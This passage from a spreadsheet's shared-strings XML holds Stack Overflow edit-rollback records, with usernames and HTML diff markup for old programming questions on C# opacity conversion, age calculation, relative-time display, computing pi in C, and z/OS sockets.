  </si>
  <si>
    <t>Rollback to [587B90E6-24B2-4C28-860B-BD00DD010133]</t>
  </si>
  <si>
    <t>1624d0cd-8201-4bfc-a26f-5d7ce1e0f94e</t>
  </si>
  <si>
    <t>Rollback to [4F94C572-D161-40A8-B53F-CEB649FDF132]</t>
  </si>
  <si>
    <t>c0da69b1-c820-435a-a754-4a3c3d0bc8df</t>
  </si>
  <si>
    <t>Rollback to [a0c65cde-5e21-4774-bf97-204df24d276e]</t>
  </si>
  <si>
    <t>f0271f8d-0df1-4178-a272-7caaa8856c5e</t>
  </si>
  <si>
    <t>Rollback to [5B824D6F-D228-4EE9-85F7-7B4D90023BC9]</t>
  </si>
  <si>
    <t>6ef641a6-5ff0-451d-8096-4c28badf28cf</t>
  </si>
  <si>
    <t>Rollback to [487EF3F7-B160-40F0-A533-2C71A21AE430]</t>
  </si>
  <si>
    <t>c0787943-f992-4196-a256-7a2e542b5f84</t>
  </si>
  <si>
    <t>Rollback to [EC0A396F-BF07-48E2-B733-438D5E760A6D]</t>
  </si>
  <si>
    <t>preEditText</t>
  </si>
  <si>
    <t>postEditText</t>
  </si>
  <si>
    <t>rollbackUserId</t>
  </si>
  <si>
    <t>rollbackUserName</t>
  </si>
  <si>
    <t>rollbackDateTime</t>
  </si>
  <si>
    <t>prevEditUserId</t>
  </si>
  <si>
    <t>prevEditUserName</t>
  </si>
  <si>
    <t>prevEditDateTime</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to use a track-bar to change a form's opacity.&lt;/p&gt; _x000D_
 &lt;p&gt; This is my code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;decimal&lt;/span&gt; trans = trackBar1.Value / &lt;span class="hljs-number"&gt;5000&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.Opacity = trans;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When I try to build it, I get this error:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Cannot implicitly convert type &lt;strong&gt;&lt;span class="diff-delete"&gt;'decimal'&lt;/span&gt;&lt;/strong&gt; to &lt;strong&gt;&lt;span class="diff-delete"&gt;'double'.&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I tried making &lt;code&gt;trans&lt;/code&gt; a &lt;code&gt;double&lt;/code&gt;, but then the control doesn't work. This code has worked fine for me in &lt;strong&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;VB.NET in the past&lt;/span&gt;&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to use a track-bar to change a form's opacity.&lt;/p&gt; _x000D_
 &lt;p&gt; This is my code:&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-built_in"&gt;decimal&lt;/span&gt; trans = trackBar1.Value / &lt;span class="hljs-number"&gt;5000&lt;/span&gt;;_x000D_
&lt;span class="hljs-keyword"&gt;this&lt;/span&gt;.Opacity = trans;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; When I try to build it, I get this error:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Cannot implicitly convert type &lt;span class="diff-add"&gt;'decimal'&lt;/span&gt; to &lt;span class="diff-add"&gt;'double'.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; I tried making &lt;code&gt;trans&lt;/code&gt; a &lt;code&gt;double&lt;/code&gt;, but then the control doesn't work. This code has worked fine for me in &lt;span class="diff-add"&gt;VB.NET in the past&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>inactive</t>
  </si>
  <si>
    <t>user456814</t>
  </si>
  <si>
    <t>VIVEK-MDU</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt; DateTime birthdate = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; DateTime(&lt;span class="hljs-number"&gt;2012&lt;/span&gt;, &lt;span class="hljs-number"&gt;11&lt;/span&gt;, &lt;span class="hljs-number"&gt;5&lt;/span&gt;);_x000D_
            DateTime now = DateTime.Now;_x000D_
            &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; years = now.Year - birthdate.Year;_x000D_
            &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (now.Month &amp;lt; birthdate.Month || (now.Month == birthdate.Month &amp;amp;&amp;amp; now.Day &amp;lt; birthdate.Day))_x000D_
                years--;_x000D_
           Console.WriteLine(years.ToString());_x000D_
           Console.ReadLine();_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Given a &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;DateTime&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; representing a person's birthday, how do I calculate their age?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mike Polen</t>
  </si>
  <si>
    <t>Shaik Raffi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Given a specific &lt;code&gt;&lt;span class="diff-delete"&gt;DateTime&lt;/span&gt;&lt;/code&gt; value, how do I display relative time, like&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 2 hours ago&lt;/li&gt; _x000D_
  &lt;li&gt; 3 days ago&lt;/li&gt; _x000D_
  &lt;li&gt; a month ago&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; etc, etc...?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Given a specific &lt;span class="diff-add"&gt;DateTime&lt;/span&gt; value, how do I display relative time, like&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 2 hours ago&lt;/li&gt; _x000D_
  &lt;li&gt; 3 days ago&lt;/li&gt; _x000D_
  &lt;li&gt; a month ago&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; etc, etc...?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Code Láƒ¦ver</t>
  </si>
  <si>
    <t>Daniel A. White</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Well, here's how we do it on Stack Overflow.&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; ts = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; TimeSpan(DateTime.UtcNow.Ticks - dt.Ticks);_x000D_
&lt;span class="hljs-built_in"&gt;double&lt;/span&gt; delta = Math.Abs(ts.TotalSeconds);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;60&lt;/span&gt;)&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Seconds == &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one second ago"&lt;/span&gt; : ts.Seconds&lt;span class="diff-delete"&gt;_x000D_
           &lt;/span&gt; + &lt;span class="hljs-string"&gt;" seconds ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;120&lt;/span&gt;)&lt;span class="diff-delete"&gt; &lt;/span&gt;{_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"a minute ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2700&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 45 * 60&lt;/span&gt;_x000D_
{_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Minutes + &lt;span class="hljs-string"&gt;" minutes ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;5400&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 90 * 60&lt;/span&gt;_x000D_
{_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"an hour ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;86400&lt;/span&gt;)&lt;span class="diff-delete"&gt; {&lt;/span&gt; &lt;span class="hljs-comment"&gt;// 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Hours + &lt;span class="hljs-string"&gt;" hours ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;172800&lt;/span&gt;) &lt;span class="diff-delete"&gt;{ &lt;/span&gt;&lt;span class="hljs-comment"&gt;// 48 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"yesterday"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2592000&lt;/span&gt;) &lt;span class="diff-delete"&gt;{ &lt;/span&gt;&lt;span class="hljs-comment"&gt;// 30 * 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Days + &lt;span class="hljs-string"&gt;" days ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;31104000&lt;/span&gt;) &lt;span class="diff-delete"&gt;{ &lt;/span&gt;&lt;span class="hljs-comment"&gt;// 12 * 30 * 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; months = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)&lt;span class="diff-delete"&gt; &lt;/span&gt;ts.Days / &lt;span class="hljs-number"&gt;30&lt;/span&gt;));_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; months &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one month ago"&lt;/span&gt; : months + &lt;span class="hljs-string"&gt;" months ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; years = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)&lt;span class="diff-delete"&gt; &lt;/span&gt;ts.Days / &lt;span class="hljs-number"&gt;365&lt;/span&gt;));_x000D_
&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; years &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one year ago"&lt;/span&gt; : years + &lt;span class="hljs-string"&gt;" years ago"&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Suggestions? Comments? Ways to improve this algorithm?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Well, here's how we do it on Stack Overflow.&lt;/p&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;var&lt;/span&gt; ts = &lt;span class="hljs-keyword"&gt;new&lt;/span&gt; TimeSpan(DateTime.UtcNow.Ticks - dt.Ticks);_x000D_
&lt;span class="hljs-built_in"&gt;double&lt;/span&gt; delta = Math.Abs(ts.TotalSeconds);_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;60&lt;/span&gt;)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Seconds == &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one second ago"&lt;/span&gt; : ts.Seconds + &lt;span class="hljs-string"&gt;" seconds ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;120&lt;/span&gt;)&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"a minute ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2700&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 45 * 60&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Minutes + &lt;span class="hljs-string"&gt;" minutes ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;5400&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 90 * 60&lt;/span&gt;_x000D_
{_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"an hour ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;86400&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;{_x000D_
&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Hours + &lt;span class="hljs-string"&gt;" hours ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;172800&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 48 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;{_x000D_
&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-string"&gt;"yesterday"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;2592000&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 30 * 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;{_x000D_
&lt;/span&gt;  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; ts.Days + &lt;span class="hljs-string"&gt;" days ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (delta &amp;lt; &lt;span class="hljs-number"&gt;31104000&lt;/span&gt;) &lt;span class="hljs-comment"&gt;// 12 * 30 * 24 * 60 * 60&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;{_x000D_
&lt;/span&gt;  &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; months = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;30&lt;/span&gt;));_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; months &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one month ago"&lt;/span&gt; : months + &lt;span class="hljs-string"&gt;" months ago"&lt;/span&gt;;_x000D_
}_x000D_
&lt;span class="hljs-built_in"&gt;int&lt;/span&gt; years = Convert.ToInt32(Math.Floor((&lt;span class="hljs-built_in"&gt;double&lt;/span&gt;)ts.Days / &lt;span class="hljs-number"&gt;365&lt;/span&gt;));_x000D_
&lt;span class="hljs-keyword"&gt;return&lt;/span&gt; years &amp;lt;= &lt;span class="hljs-number"&gt;1&lt;/span&gt; ? &lt;span class="hljs-string"&gt;"one year ago"&lt;/span&gt; : years + &lt;span class="hljs-string"&gt;" years ago"&lt;/span&gt;;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Suggestions? Comments? Ways to improve this algorithm?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Patrick McDonald</t>
  </si>
  <si>
    <t>Bhavik Ambani</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm looking for the fastest way to obtain the value of pi, as a personal challenge. More specifically I'm using ways that don't involve using &lt;code&gt;#define&lt;/code&gt;d constants like &lt;code&gt;M_PI&lt;/code&gt;, or hard-coding the number in.&lt;/p&gt; _x000D_
 &lt;p&gt; The program below tests the various ways I know of. The inline assembly version is, in theory, the fastest option, though clearly not portable; I've included it as a baseline to compare the other versions against. In my tests, with built-ins, the &lt;code&gt;4 * atan(1)&lt;/code&gt; version is fastest on GCC 4.2, because it auto-folds the &lt;code&gt;atan(1)&lt;/code&gt; into a constant. With &lt;code&gt;-fno-builtin&lt;/code&gt; specified, the &lt;code&gt;atan2(0, -1)&lt;/code&gt; version is fastest.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the main testing program (&lt;code&gt;pitimes.c&lt;/code&gt;):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;math.h&amp;gt;_x000D_
#include &amp;lt;stdio.h&amp;gt;_x000D_
#include &amp;lt;time.h&amp;gt;_x000D_
_x000D_
#define ITERS 10000000_x000D_
#define TESTWITH(x) {                                                       \_x000D_
    diff = 0.0;                                                             \_x000D_
    time1 = clock();                                                        \_x000D_
    for (i = 0; i &amp;lt; ITERS; ++i)                                             \_x000D_
        diff += (x) - M_PI;                                                 \_x000D_
    time2 = clock();                                                        \_x000D_
    printf("%s\t=&amp;gt; %e, time =&amp;gt; %f\n", #x, diff, diffclock(time2, time1));   \_x000D_
}_x000D_
_x000D_
static inline double_x000D_
diffclock(clock_t time1, clock_t time0)_x000D_
{_x000D_
    return (double) (time1 - time0) / CLOCKS_PER_SEC;_x000D_
}_x000D_
_x000D_
int_x000D_
main()_x000D_
{_x000D_
    int i;_x000D_
    clock_t time1, time2;_x000D_
    double diff;_x000D_
_x000D_
    /* Warmup. The atan2 case catches GCC's atan folding (which would_x000D_
     * optimise the ``4 * atan(1) - M_PI'' to a no-op), if -fno-builtin_x000D_
     * is not used. */_x000D_
    TESTWITH(4 * atan(1))_x000D_
    TESTWITH(4 * atan2(1, 1))_x000D_
_x000D_
#if defined(__GNUC__) &amp;amp;&amp;amp; (defined(__i386__) || defined(__amd64__))_x000D_
    extern double fldpi();_x000D_
    TESTWITH(fldpi())_x000D_
#endif_x000D_
_x000D_
    /* Actual tests start here. */_x000D_
    TESTWITH(atan2(0, -1))_x000D_
    TESTWITH(acos(-1))_x000D_
    TESTWITH(2 * asin(1))_x000D_
    TESTWITH(4 * atan2(1, 1))_x000D_
    TESTWITH(4 * atan(1))_x000D_
_x000D_
    return 0;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And the inline assembly stuff (&lt;code&gt;fldpi.c&lt;/code&gt;), noting that it will only work for x86 and x64 systems:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;double_x000D_
fldpi()_x000D_
{_x000D_
    double pi;_x000D_
    asm("fldpi" : "=t" (pi));_x000D_
    return pi;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And a build script that builds all the configurations I'm testing (&lt;code&gt;build.sh&lt;/code&gt;):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#!/bin/sh_x000D_
gcc -O3 -Wall -c           -m32 -o fldpi-32.o fldpi.c_x000D_
gcc -O3 -Wall -c           -m64 -o fldpi-64.o fldpi.c_x000D_
_x000D_
gcc -O3 -Wall -ffast-math  -m32 -o pitimes1-32 pitimes.c fldpi-32.o_x000D_
gcc -O3 -Wall              -m32 -o pitimes2-32 pitimes.c fldpi-32.o -lm_x000D_
gcc -O3 -Wall -fno-builtin -m32 -o pitimes3-32 pitimes.c fldpi-32.o -lm_x000D_
gcc -O3 -Wall -ffast-math  -m64 -o pitimes1-64 pitimes.c fldpi-64.o -lm_x000D_
gcc -O3 -Wall              -m64 -o pitimes2-64 pitimes.c fldpi-64.o -lm_x000D_
gcc -O3 -Wall -fno-builtin -m64 -o pitimes3-64 pitimes.c fldpi-64.o -lm_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apart from testing between various compiler flags (I've compared 32-bit against 64-bit too, because the optimisations are different), I've also tried switching the order of the tests around. The &lt;code&gt;atan2(0, -1)&lt;/code&gt; version still comes out top every time, though.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm keen to hear what results you have, as well as improvements to the testing process. :-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Solutions welcome in any language. :-)&lt;/span&gt; I'm looking for the fastest way to obtain the value of pi, as a personal challenge. More specifically I'm using ways that don't involve using &lt;code&gt;#define&lt;/code&gt;d constants like &lt;code&gt;M_PI&lt;/code&gt;, or hard-coding the number in.&lt;/p&gt; _x000D_
 &lt;p&gt; The program below tests the various ways I know of. The inline assembly version is, in theory, the fastest option, though clearly not portable; I've included it as a baseline to compare the other versions against. In my tests, with built-ins, the &lt;code&gt;4 * atan(1)&lt;/code&gt; version is fastest on GCC 4.2, because it auto-folds the &lt;code&gt;atan(1)&lt;/code&gt; into a constant. With &lt;code&gt;-fno-builtin&lt;/code&gt; specified, the &lt;code&gt;atan2(0, -1)&lt;/code&gt; version is fastest.&lt;/p&gt; _x000D_
 &lt;p&gt; Here's the main testing program (&lt;code&gt;pitimes.c&lt;/code&gt;):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#include &amp;lt;math.h&amp;gt;_x000D_
#include &amp;lt;stdio.h&amp;gt;_x000D_
#include &amp;lt;time.h&amp;gt;_x000D_
_x000D_
#define ITERS 10000000_x000D_
#define TESTWITH(x) {                                                       \_x000D_
    diff = 0.0;                                                             \_x000D_
    time1 = clock();                                                        \_x000D_
    for (i = 0; i &amp;lt; ITERS; ++i)                                             \_x000D_
        diff += (x) - M_PI;                                                 \_x000D_
    time2 = clock();                                                        \_x000D_
    printf("%s\t=&amp;gt; %e, time =&amp;gt; %f\n", #x, diff, diffclock(time2, time1));   \_x000D_
}_x000D_
_x000D_
static inline double_x000D_
diffclock(clock_t time1, clock_t time0)_x000D_
{_x000D_
    return (double) (time1 - time0) / CLOCKS_PER_SEC;_x000D_
}_x000D_
_x000D_
int_x000D_
main()_x000D_
{_x000D_
    int i;_x000D_
    clock_t time1, time2;_x000D_
    double diff;_x000D_
_x000D_
    /* Warmup. The atan2 case catches GCC's atan folding (which would_x000D_
     * optimise the ``4 * atan(1) - M_PI'' to a no-op), if -fno-builtin_x000D_
     * is not used. */_x000D_
    TESTWITH(4 * atan(1))_x000D_
    TESTWITH(4 * atan2(1, 1))_x000D_
_x000D_
#if defined(__GNUC__) &amp;amp;&amp;amp; (defined(__i386__) || defined(__amd64__))_x000D_
    extern double fldpi();_x000D_
    TESTWITH(fldpi())_x000D_
#endif_x000D_
_x000D_
    /* Actual tests start here. */_x000D_
    TESTWITH(atan2(0, -1))_x000D_
    TESTWITH(acos(-1))_x000D_
    TESTWITH(2 * asin(1))_x000D_
    TESTWITH(4 * atan2(1, 1))_x000D_
    TESTWITH(4 * atan(1))_x000D_
_x000D_
    return 0;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And the inline assembly stuff (&lt;code&gt;fldpi.c&lt;/code&gt;), noting that it will only work for x86 and x64 systems:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;double_x000D_
fldpi()_x000D_
{_x000D_
    double pi;_x000D_
    asm("fldpi" : "=t" (pi));_x000D_
    return pi;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And a build script that builds all the configurations I'm testing (&lt;code&gt;build.sh&lt;/code&gt;):&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#!/bin/sh_x000D_
gcc -O3 -Wall -c           -m32 -o fldpi-32.o fldpi.c_x000D_
gcc -O3 -Wall -c           -m64 -o fldpi-64.o fldpi.c_x000D_
_x000D_
gcc -O3 -Wall -ffast-math  -m32 -o pitimes1-32 pitimes.c fldpi-32.o_x000D_
gcc -O3 -Wall              -m32 -o pitimes2-32 pitimes.c fldpi-32.o -lm_x000D_
gcc -O3 -Wall -fno-builtin -m32 -o pitimes3-32 pitimes.c fldpi-32.o -lm_x000D_
gcc -O3 -Wall -ffast-math  -m64 -o pitimes1-64 pitimes.c fldpi-64.o -lm_x000D_
gcc -O3 -Wall              -m64 -o pitimes2-64 pitimes.c fldpi-64.o -lm_x000D_
gcc -O3 -Wall -fno-builtin -m64 -o pitimes3-64 pitimes.c fldpi-64.o -lm_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Apart from testing between various compiler flags (I've compared 32-bit against 64-bit too, because the optimisations are different), I've also tried switching the order of the tests around. The &lt;code&gt;atan2(0, -1)&lt;/code&gt; version still comes out top every time, though.&lt;/p&gt; _x000D_
 &lt;p&gt; I'm keen to hear what results you have, as well as improvements to the testing process. :-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chris Jester-Young</t>
  </si>
  <si>
    <t>Naeem Ul Wahhab</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've been having issues getting the &lt;strong&gt;&lt;span class="diff-delete"&gt;C sockets API&lt;/span&gt;&lt;/strong&gt; to work properly in &lt;code&gt;&lt;span class="diff-delete"&gt;C++&lt;/span&gt;&lt;/code&gt;. Specifically, &lt;span class="diff-delete"&gt;even though I'm&lt;/span&gt; including &lt;code&gt;sys/socket.h&lt;/code&gt;, &lt;span class="diff-delete"&gt;I'm&lt;/span&gt; still &lt;span class="diff-delete"&gt;getting&lt;/span&gt; compile time errors telling me that &lt;code&gt;AF_INET&lt;/code&gt; is not defined. Am I missing something obvious, or could this be related to the fact that I'm doing this coding on &lt;code&gt;z/OS&lt;/code&gt; and my problems are much more complicated?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Upon further investigation, I discovered that there is an &lt;code&gt;&lt;span class="diff-delete"&gt;#ifdef&lt;/span&gt;&lt;/code&gt; that I'm hitting. Apparently &lt;code&gt;z/OS&lt;/code&gt; isn't happy unless I define which &lt;em&gt;&lt;span class="diff-delete"&gt;type&lt;/span&gt;&lt;/em&gt; of sockets I'm using with:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; _OE_SOCKETS&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now, I personally have no idea what this &lt;code&gt;_OE_SOCKETS&lt;/code&gt; is actually for, so if any &lt;code&gt;z/OS&lt;/code&gt; sockets programmers are out there (all 3 of you), perhaps you could give me a rundown &lt;span class="diff-delete"&gt;on&lt;/span&gt; how this all works?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
